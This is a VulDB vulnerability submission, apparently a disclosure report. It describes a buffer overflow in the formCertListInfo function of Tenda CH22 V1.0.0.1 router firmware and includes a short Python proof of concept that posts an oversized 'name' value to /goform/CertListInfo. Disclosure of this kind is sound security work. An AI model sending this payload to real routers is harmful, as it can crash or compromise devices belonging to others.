Submit #855077: Tenda CH22 V1.0.0.1 Buffer Overflowinfo

TitelTenda CH22 V1.0.0.1 Buffer Overflow
Beschreibung## Overview - Firmware download website: https://www.tenda.com.cn/download/2230 ## Affected version CH22 V1.0.0.1 ## Vulnerability details The Tenda CH22 V1.0.0.1 firmware has a buffer overflow vulnerability in the `formCertListInfo` function. The `V12` variable receives the `name` parameter from a POST request and is later passed to the `sprintf` function. However, since the user can control the input of `name` , the statement `sprintf(s, "/etc/cert/%s", v12);` can cause a buffer overflow. ##PoC import requests ip = "192.168.1.1" url = f'http://{ip}/goform/CertListInfo' payload = b'a' * 1000 data = {    'name':payload } requests.post(url, data=data)
Quelle⚠️ https://candle-throne-f75.notion.site/Tenda-CH22-formCertListInfo-377df0aa11858088aabaeb0f5e1909c9
Benutzer
 ysnysn0121 (UID 86198)
Einreichung10.06.2026 15:17 (vor 1 Monat)
Moderieren12.07.2026 20:14 (1 month later)
StatusAkzeptiert
VulDB Eintrag377893 [Tenda CH22 1.0.0.1 /goform/CertListInfo formCertListInfo Name Pufferüberlauf]
Punkte17

Want to stay up to date on a daily basis?

Enable the mail alert feature now!